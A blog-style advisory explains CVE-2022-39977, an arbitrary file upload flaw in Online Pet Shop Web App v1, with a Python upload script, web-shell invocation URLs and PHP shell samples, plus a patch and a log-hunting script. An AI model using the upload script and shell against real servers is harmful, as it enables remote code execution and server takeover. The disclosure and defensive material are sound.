In 2022, security researchers disclosed a critical vulnerability in the Online Pet Shop Web App v1. Tracked as CVE-2022-39977, the flaw lets an authenticated user upload dangerous files through the account editing function in the User module, which can hand them control of the entire web server. In this post we break down how the vulnerability works, show code snippets for the exploit and the fix, point to the official references, and explain the impact in plain terms.

What is CVE-2022-39977?

CVE-2022-39977 is an arbitrary file upload vulnerability. Anyone with an account (an ordinary registered user is enough) can upload any file, such as a PHP script, through the profile picture update feature. Because the file is stored where the web server serves it, the attacker can then request it and have the server execute it, which is remote code execution (RCE).

Where is the Vulnerability?

The flaw is in the Editing function of the User module, specifically the part that handles profile picture uploads. The application does not check the type or contents of the uploaded file, and it saves the file under the name the client supplied.

Suppose the profile update code looks something like this (illustrative, not the real code):

if(isset($_FILES['picture'])){
    // Name and temp path come straight from the multipart request, unvalidated
    $file_name = $_FILES['picture']['name'];
    $file_tmp = $_FILES['picture']['tmp_name'];
    // Saved under the attacker-chosen name inside the web root
    move_uploaded_file($file_tmp, "uploads/" . $file_name);
}

Nothing here checks whether the upload is actually an image, and nothing restricts the extension. An attacker can therefore upload shell.php instead of a picture; it lands at uploads/shell.php, and a request for that path makes the server run it as PHP.

How Is It Exploited?

1. Log in to the application as an ordinary registered user.
2. Go to the profile edit page, where you can upload a new profile picture.
3. Instead of uploading a real image, the attacker prepares a malicious PHP file (for example, shell.php) that runs whatever command is passed in its cmd parameter, and uploads it as the picture.
4. Because the file is saved under its own name in the web root, the attacker can now request it directly and pass commands to it:

http://example.com/uploads/shell.php?cmd=ls

Here's how you could automate the upload (for educational purposes only):

import requests

url = 'http://example.com/user/edit.php'
# Session cookie for the attacker's own (ordinary) account; obtaining it is not shown here
cookies = {'PHPSESSID': '...'}
data = {'username': 'your_username', 'submit': 'Update'}
# The PHP file goes in the 'picture' field that is meant for the profile image
with open('shell.php', 'rb') as f:
    files = {'picture': f}
    response = requests.post(url, files=files, data=data, cookies=cookies)
print(response.status_code)

After upload, the attacker can browse to

http://example.com/uploads/shell.php?cmd=id

What Is the Risk?

- Remote Code Execution: attackers can run any command on the web server with the web server's privileges. They may steal data, change files, or use the server to attack others.

- Web Shells: the uploaded file is itself a "web shell", giving the attacker ongoing access for as long as it remains in uploads/.

- Full Takeover: if the web server process runs with elevated privileges, an attacker can fully compromise the site or the entire host machine.

Official References

- NVD - CVE-2022-39977
- Exploit-DB 50925  
- GitHub Advisory  
- Full Disclosure mailing list report

How Can You Fix This?

For Developers:

Validate what the file is, not what it is called: inspect its bytes, allow only image extensions, and store it under a server-generated name.

Example Patch

// Inspect the file's leading bytes rather than trusting its name or MIME type
$allowed_types = array(IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG);
$detected_type = exif_imagetype($_FILES['picture']['tmp_name']);
if (!in_array($detected_type, $allowed_types)) {
    die("This file type is not allowed");
}

On its own this check is not enough. exif_imagetype() reads only the first bytes of the file, so a file that begins with a GIF header and continues with PHP code passes it, and if that file is still saved as shell.php in uploads/ the server will execute it. Pair the check with an extension allow-list, save the file under a server-generated name whose extension comes from the detected type rather than from the upload, and configure the web server so that nothing under uploads/ is handed to the PHP interpreter.

For Users:

Site owners should apply the fix above or an official patch, make sure the web server does not execute scripts from the uploads directory, and review that directory for files that are not images, since an already-planted web shell survives an upgrade.
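For site owners who want to know whether the upload feature has already been abused, here is an added hunting script; it is not part of the original post or of the application. It builds a throwaway uploads/ directory containing constructed files and scans three constructed access-log lines. The directory name, the Apache/nginx combined log format and the regular expressions are assumptions.

```python
"""Added hunting script, not part of the original post or the application:
look for a web shell that was already planted through the upload feature."""
import os
import re
import tempfile

IMAGE_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png"}
# Only the full open tag: "<?" alone would fire on random bytes in real JPEGs.
PHP_TAG = re.compile(rb"<\?php")
# Request line of an Apache/nginx combined-format entry asking for a script
# under /uploads/ (assumed path and extensions).
SHELL_REQUEST = re.compile(
    r'"(?:GET|POST) (/uploads/[^ ?"]+\.(?:php\d?|phtml))(?:\?([^ "]*))? HTTP/'
)


def suspicious_uploads(upload_dir):
    """Return (path, reason) for every file that is not simply an image."""
    findings = []
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            path = os.path.join(root, name)
            ext = os.path.splitext(name)[1].lower()
            if ext not in IMAGE_EXTENSIONS:
                findings.append((path, "non-image extension " + (ext or "(none)")))
                continue
            with open(path, "rb") as fh:
                head = fh.read(1 << 20)   # header polyglots put the code up front
            if PHP_TAG.search(head):
                findings.append((path, "PHP open tag inside an image file"))
    return sorted(findings)


def shell_requests(log_lines):
    """Return (path, query) for each request that ran a script under /uploads/."""
    hits = []
    for line in log_lines:
        match = SHELL_REQUEST.search(line)
        if match:
            hits.append((match.group(1), match.group(2) or ""))
    return hits


# Constructed access-log lines for the demo; hosts and timestamps are invented.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Oct/2022:21:03:11 +0000] "POST /user/edit.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [27/Oct/2022:21:03:40 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 57',
    '198.51.100.2 - - [27/Oct/2022:21:04:02 +0000] "GET /uploads/avatar.png HTTP/1.1" 200 9120',
]


def demo():
    """Build a throwaway uploads/ tree with constructed files, scan it and the
    sample log. Returns ([(basename, reason)], [(path, query)])."""
    with tempfile.TemporaryDirectory() as tmp:
        files = {
            "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,       # clean image
            "shell.php": b"<?php system($_GET['cmd']); ?>",         # bare shell
            "cute.gif": b"GIF89a<?php system($_GET['cmd']); ?>",    # polyglot
        }
        for name, content in files.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(content)
        found = [(os.path.basename(p), why) for p, why in suspicious_uploads(tmp)]
    return sorted(found), shell_requests(SAMPLE_LOG)


if __name__ == "__main__":
    uploads, requests_seen = demo()
    for item in uploads + requests_seen:
        print(item)
```

Point suspicious_uploads() at the real uploads directory and shell_requests() at the real access log; a request for a .php path under /uploads/ that returned 200 is the strongest signal, and any file the scan flags should be treated as a compromise, not just deleted.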

Final Thoughts

CVE-2022-39977 is a good example of how weak validation in a file upload feature can hand attackers the keys to the kingdom. Developers should treat every upload as hostile until its type, extension and storage location have been checked, and site owners must keep their applications updated to avoid becoming a target.

If your organization runs Online Pet Shop Web App v1., fix this vulnerability immediately.

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:07:00 UTC